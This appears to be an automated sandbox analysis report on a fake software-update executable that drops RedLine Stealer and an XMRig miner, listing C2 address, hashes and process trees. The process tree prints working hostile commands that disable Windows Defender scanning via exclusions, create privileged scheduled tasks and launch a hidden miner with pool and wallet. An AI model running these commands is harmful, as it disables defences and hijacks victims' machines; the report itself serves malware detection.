Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
26-10-2021 15:33
Static task
static1
Behavioral task
behavioral1
Sample
Software updated by Dylox.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
Software updated by Dylox.exe
Resource
win10-en-20210920
Behavioral task
behavioral3
Sample
Software-update-patc_828811790.exe
Resource
win7-en-20210920
Behavioral task
behavioral4
Sample
Software-update-patc_828811790.exe
Resource
win10-en-20211014
Behavioral task
behavioral5
Sample
open this if the doesn't work.exe
Resource
win7-en-20210920
Behavioral task
behavioral6
Sample
open this if the doesn't work.exe
Resource
win10-en-20211014
General
-
Target
Software updated by Dylox.exe
-
Size
3.2MB
-
MD5
6f78118b606c3c7c9bad1a9e0671cda8
-
SHA1
00abbc6a45d7009d8e166794289b39d0bb709ba5
-
SHA256
7be5baa4d9a45af1e6f15fdf6600537ed78e1694f9daa37741b5e8c3e58d7005
-
SHA512
77d474c0a67754e7f71ee1c932cd4f21bcbd1f94472ffd9c21cbe2c6242f5fa07f5fede82255b9037cff87fbde614225105db3b6a55be560dfc10ac74149d916
Malware Config
Extracted
redline
Youtube
185.203.240.16:1249
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/760-140-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/760-141-0x0000000000418D32-mapping.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
XMRig Miner Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3016-505-0x000000014030F3F8-mapping.dmp xmrig behavioral2/memory/3016-511-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
Datafile32.exeDatafile64.exeServer32.exeServer32.exeservices32.exeservices64.exesihost32.exesihost64.exepid process 4044 Datafile32.exe 1016 Datafile64.exe 2196 Server32.exe 760 Server32.exe 3116 services32.exe 760 services64.exe 1512 sihost32.exe 2324 sihost64.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Datafile64.exeservices64.exeSoftware updated by Dylox.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Datafile64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion services64.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Software updated by Dylox.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral2/memory/2848-118-0x0000000001020000-0x0000000001021000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida C:\Users\Admin\AppData\Local\Temp\Datafile64.exe themida behavioral2/memory/1016-129-0x0000000000400000-0x0000000000EAE000-memory.dmp themida C:\Windows\System32\services64.exe themida C:\Windows\system32\services64.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Software updated by Dylox.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Datafile64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA services64.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 4 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\system32\services64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
Software updated by Dylox.exeDatafile64.exeservices64.exepid process 2848 Software updated by Dylox.exe 1016 Datafile64.exe 760 services64.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
Server32.execonhost.exedescription pid process target process PID 2196 set thread context of 760 2196 Server32.exe Server32.exe PID 1504 set thread context of 3016 1504 conhost.exe nslookup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3640 schtasks.exe 1932 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
conhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exepowershell.execonhost.exepowershell.exenslookup.exepid process 1408 conhost.exe 1992 powershell.exe 1992 powershell.exe 1992 powershell.exe 3196 powershell.exe 3196 powershell.exe 3196 powershell.exe 760 Server32.exe 2132 conhost.exe 2416 powershell.exe 2416 powershell.exe 2416 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 2772 conhost.exe 2772 conhost.exe 3800 powershell.exe 3800 powershell.exe 3800 powershell.exe 1704 powershell.exe 1704 powershell.exe 1704 powershell.exe 1504 conhost.exe 1504 conhost.exe 1716 powershell.exe 1716 powershell.exe 1716 powershell.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe 3016 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Software updated by Dylox.execonhost.exepowershell.exepowershell.exeServer32.execonhost.exepowershell.exedescription pid process Token: SeDebugPrivilege 2848 Software updated by Dylox.exe Token: SeDebugPrivilege 1408 conhost.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeIncreaseQuotaPrivilege 1992 powershell.exe Token: SeSecurityPrivilege 1992 powershell.exe Token: SeTakeOwnershipPrivilege 1992 powershell.exe Token: SeLoadDriverPrivilege 1992 powershell.exe Token: SeSystemProfilePrivilege 1992 powershell.exe Token: SeSystemtimePrivilege 1992 powershell.exe Token: SeProfSingleProcessPrivilege 1992 powershell.exe Token: SeIncBasePriorityPrivilege 1992 powershell.exe Token: SeCreatePagefilePrivilege 1992 powershell.exe Token: SeBackupPrivilege 1992 powershell.exe Token: SeRestorePrivilege 1992 powershell.exe Token: SeShutdownPrivilege 1992 powershell.exe Token: SeDebugPrivilege 1992 powershell.exe Token: SeSystemEnvironmentPrivilege 1992 powershell.exe Token: SeRemoteShutdownPrivilege 1992 powershell.exe Token: SeUndockPrivilege 1992 powershell.exe Token: SeManageVolumePrivilege 1992 powershell.exe Token: 33 1992 powershell.exe Token: 34 1992 powershell.exe Token: 35 1992 powershell.exe Token: 36 1992 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 760 Server32.exe Token: SeIncreaseQuotaPrivilege 3196 powershell.exe Token: SeSecurityPrivilege 3196 powershell.exe Token: SeTakeOwnershipPrivilege 3196 powershell.exe Token: SeLoadDriverPrivilege 3196 powershell.exe Token: SeSystemProfilePrivilege 3196 powershell.exe Token: SeSystemtimePrivilege 3196 powershell.exe Token: SeProfSingleProcessPrivilege 3196 powershell.exe Token: SeIncBasePriorityPrivilege 3196 powershell.exe Token: SeCreatePagefilePrivilege 3196 powershell.exe Token: SeBackupPrivilege 3196 powershell.exe Token: SeRestorePrivilege 3196 powershell.exe Token: SeShutdownPrivilege 3196 powershell.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeSystemEnvironmentPrivilege 3196 powershell.exe Token: SeRemoteShutdownPrivilege 3196 powershell.exe Token: SeUndockPrivilege 3196 powershell.exe Token: SeManageVolumePrivilege 3196 powershell.exe Token: 33 3196 powershell.exe Token: 34 3196 powershell.exe Token: 35 3196 powershell.exe Token: 36 3196 powershell.exe Token: SeDebugPrivilege 2132 conhost.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeIncreaseQuotaPrivilege 2416 powershell.exe Token: SeSecurityPrivilege 2416 powershell.exe Token: SeTakeOwnershipPrivilege 2416 powershell.exe Token: SeLoadDriverPrivilege 2416 powershell.exe Token: SeSystemProfilePrivilege 2416 powershell.exe Token: SeSystemtimePrivilege 2416 powershell.exe Token: SeProfSingleProcessPrivilege 2416 powershell.exe Token: SeIncBasePriorityPrivilege 2416 powershell.exe Token: SeCreatePagefilePrivilege 2416 powershell.exe Token: SeBackupPrivilege 2416 powershell.exe Token: SeRestorePrivilege 2416 powershell.exe Token: SeShutdownPrivilege 2416 powershell.exe Token: SeDebugPrivilege 2416 powershell.exe Token: SeSystemEnvironmentPrivilege 2416 powershell.exe Token: SeRemoteShutdownPrivilege 2416 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Software updated by Dylox.exeServer32.exeDatafile32.execonhost.execmd.execmd.exeDatafile64.execonhost.execmd.execmd.execmd.execmd.exeservices32.execonhost.execmd.exesihost32.exeservices64.exedescription pid process target process PID 2848 wrote to memory of 4044 2848 Software updated by Dylox.exe Datafile32.exe PID 2848 wrote to memory of 4044 2848 Software updated by Dylox.exe Datafile32.exe PID 2848 wrote to memory of 1016 2848 Software updated by Dylox.exe Datafile64.exe PID 2848 wrote to memory of 1016 2848 Software updated by Dylox.exe Datafile64.exe PID 2848 wrote to memory of 2196 2848 Software updated by Dylox.exe Server32.exe PID 2848 wrote to memory of 2196 2848 Software updated by Dylox.exe Server32.exe PID 2848 wrote to memory of 2196 2848 Software updated by Dylox.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 2196 wrote to memory of 760 2196 Server32.exe Server32.exe PID 4044 wrote to memory of 1408 4044 Datafile32.exe conhost.exe PID 4044 wrote to memory of 1408 4044 Datafile32.exe conhost.exe PID 4044 wrote to memory of 1408 4044 Datafile32.exe conhost.exe PID 1408 wrote to memory of 1620 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 1620 1408 conhost.exe cmd.exe PID 1620 wrote to memory of 1992 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 1992 1620 cmd.exe powershell.exe PID 1408 wrote to memory of 3044 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 3044 1408 conhost.exe cmd.exe PID 3044 wrote to memory of 3640 3044 cmd.exe schtasks.exe PID 3044 wrote to memory of 3640 3044 cmd.exe schtasks.exe PID 1620 wrote to memory of 3196 1620 cmd.exe powershell.exe PID 1620 wrote to memory of 3196 1620 cmd.exe powershell.exe PID 1016 wrote to memory of 2132 1016 Datafile64.exe conhost.exe PID 1016 wrote to memory of 2132 1016 Datafile64.exe conhost.exe PID 1016 wrote to memory of 2132 1016 Datafile64.exe conhost.exe PID 2132 wrote to memory of 3632 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 3632 2132 conhost.exe cmd.exe PID 3632 wrote to memory of 2416 3632 cmd.exe powershell.exe PID 3632 wrote to memory of 2416 3632 cmd.exe powershell.exe PID 2132 wrote to memory of 1332 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 1332 2132 conhost.exe cmd.exe PID 1332 wrote to memory of 1932 1332 cmd.exe schtasks.exe PID 1332 wrote to memory of 1932 1332 cmd.exe schtasks.exe PID 1408 wrote to memory of 3620 1408 conhost.exe cmd.exe PID 1408 wrote to memory of 3620 1408 conhost.exe cmd.exe PID 3620 wrote to memory of 3116 3620 cmd.exe services32.exe PID 3620 wrote to memory of 3116 3620 cmd.exe services32.exe PID 3632 wrote to memory of 396 3632 cmd.exe powershell.exe PID 3632 wrote to memory of 396 3632 cmd.exe powershell.exe PID 2132 wrote to memory of 1496 2132 conhost.exe cmd.exe PID 2132 wrote to memory of 1496 2132 conhost.exe cmd.exe PID 1496 wrote to memory of 760 1496 cmd.exe services64.exe PID 1496 wrote to memory of 760 1496 cmd.exe services64.exe PID 3116 wrote to memory of 2772 3116 services32.exe conhost.exe PID 3116 wrote to memory of 2772 3116 services32.exe conhost.exe PID 3116 wrote to memory of 2772 3116 services32.exe conhost.exe PID 2772 wrote to memory of 428 2772 conhost.exe cmd.exe PID 2772 wrote to memory of 428 2772 conhost.exe cmd.exe PID 428 wrote to memory of 3800 428 cmd.exe powershell.exe PID 428 wrote to memory of 3800 428 cmd.exe powershell.exe PID 2772 wrote to memory of 1512 2772 conhost.exe sihost32.exe PID 2772 wrote to memory of 1512 2772 conhost.exe sihost32.exe PID 428 wrote to memory of 1704 428 cmd.exe powershell.exe PID 428 wrote to memory of 1704 428 cmd.exe powershell.exe PID 1512 wrote to memory of 3112 1512 sihost32.exe conhost.exe PID 1512 wrote to memory of 3112 1512 sihost32.exe conhost.exe PID 1512 wrote to memory of 3112 1512 sihost32.exe conhost.exe PID 760 wrote to memory of 1504 760 services64.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"C:\Users\Admin\AppData\Local\Temp\Software updated by Dylox.exe"1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile32.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services32" /tr "C:\Users\Admin\services32.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\services32.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\services32.exeC:\Users\Admin\services32.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "C:\Users\Admin\services32.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\\conhost.exe" "/sihost32"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Datafile64.exe"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"5⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe5⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"6⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵
-
C:\Windows\System32\nslookup.exeC:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=50 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6NiP86mD8cW+f6jtmqjmEDLY00XM3Bo2fOksM1LJ6Dgf" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9usjHhXda167RDDOeCiLgdiepY0+9J4GWfDFBWRnvZEIn9njCW10s1hFXvQH+unnKdsaoBPNxSaPInK8O97Hj64jPqNG5qPd3DSjbVR1Cvuh9P29ZftnsNS50GnGtYvaNRBa6443D9MamN7WKSEjXwi5X466GHpLm7tClAm3T8zHW8BSKHq3yutkuduzGC2BYW5rxa17LYp4CzfKufpZJNPcoGIEVeut/xrvPPi+IYNCKrJPaDMN2ZJkpVGMqbuc5AF89xn8L6Lg1pYhaW8QjVZfQAkz7FVC8K667Gg6noLQpAyfd6lW36v4zbzg+fy82rNQmYSI3WMfiYNmvJM8DVc0772kBqEwUisr6ktdw4QlqXJe45Hvgu4yC2Rb6/ntnmOTLJz66c2h/wdUSvS18C67j6jsTvSh7k7avmCdG4sgS/BcyNsYOGIVjgNICoikSjNVrnFxCscaJerBnNPv197mrO4+rRF20+jzVnXKaNAmzbmoa4UjU13WSWasSDIT/HLOYsB6MqZ9V7F19H0MAEc0HL5dHX6oXKZkVMPa+PCA=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Server32.exe"C:\Users\Admin\AppData\Local\Temp\Server32.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server32.exeC:\Users\Admin\AppData\Local\Temp\Server32.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.logMD5
84f2160705ac9a032c002f966498ef74
SHA1e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
SHA2567840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
SHA512f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Server32.exe.logMD5
41fbed686f5700fc29aaccf83e8ba7fd
SHA15271bc29538f11e42a3b600c8dc727186e912456
SHA256df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437
SHA512234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
91f58c55452f07632f3747097335621b
SHA1e30b2caebaf73e683dc4d2990ef87924580e1d52
SHA2562e7e2d429b53606ef0eab9a5b8b6902019be497dbf0dd0bb63ed134408dbe727
SHA512c61a0c1bb05e620e00260710b6bdf68db9358afea449424deed22050688a26c393c4a6c40117371f66c12bffd1a319919ebb7ee4c0d932b27d3f8253c87f3764
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
9d15151d47657c4f551820e55337c2da
SHA18aa655c0b87bbd3c5212816c3b402849a8d4284e
SHA256dcf73bcb5a54efbba464e8fae8e6d9cb961a371e10f04c44ae28d4b5a6243656
SHA5121ce44057ba13375e465377ad8c9881a854e7aadfaa7cbc365d06efdc8ef5674ba69f0a2a05fe2db829386ef6e54796d6676f5f99b61c849209e5f01ef598cb18
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
2e3da96b53c8914fe47b7ff32e72ef98
SHA11c92ee7c32c302a3a527168dcf744508ca711082
SHA2569d56479b18affb519eaa5a8a5415205c8a2b4b76aa6982a28f3a0cdb3641c5e0
SHA512480e073b9030cc9d633887d1f22421d9166a2a94080b8d81b1ab589e293d8110445d0aa4bd3089e0e28cf26bf657e486d67cfdda5476e854502bf7c1ee202b99
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
95a9df5ab7468c20f2ac763163239ff3
SHA1eeeb7537d55c70177f54fde3d5dcd143c3432ff8
SHA256723f16b62cdd5138527881d04fb6cba0834d1e5b44c6a3a972dc71f6f16d274b
SHA512acbfec25f10cbbbbd54586d8bd75d9799d6a16cfbe574961b2982bafa74a5671b7c099bcac122829da8f2d43a75ba88817146548b98bb4dd11b53fa0d91c45ca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
30e0bfd5342d3e14b551c37ff1a22ea2
SHA121f2dbfdd5ab8fee1ba142016aed5bf933a60a4c
SHA2568b629c5626f79773b5b41235ffd4e2d152732a782b30e6f2194e098dc280ba65
SHA512cc90d26f663b519a74c5812b12e6f4a4a8c738169b2d318def97f3ef0af378076b01811368f5e523016b11a0b9b5800a595b01815309bf15e017e5e59edf7606
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
195f354e5855a0d1cc7efaa8362cf594
SHA1e271f3840bcb8611a41fdc43e736b0502c1701f1
SHA2564560bd87169bf8b75e118e53741350606cf755e6b9eaf7afb2e6bf1416bbfd7b
SHA512240905885440b415b7b4b13f73ce190b2cf22f6bec84408fca6c9fc9d4f2fcf2e707b0c1e1e95b815e4fe426d9360bcc2fcf74318c378cec2133d4424784e555
-
C:\Users\Admin\AppData\Local\Temp\Datafile32.exeMD5
55f246c4f670bddc2e1c6fab66fb9af8
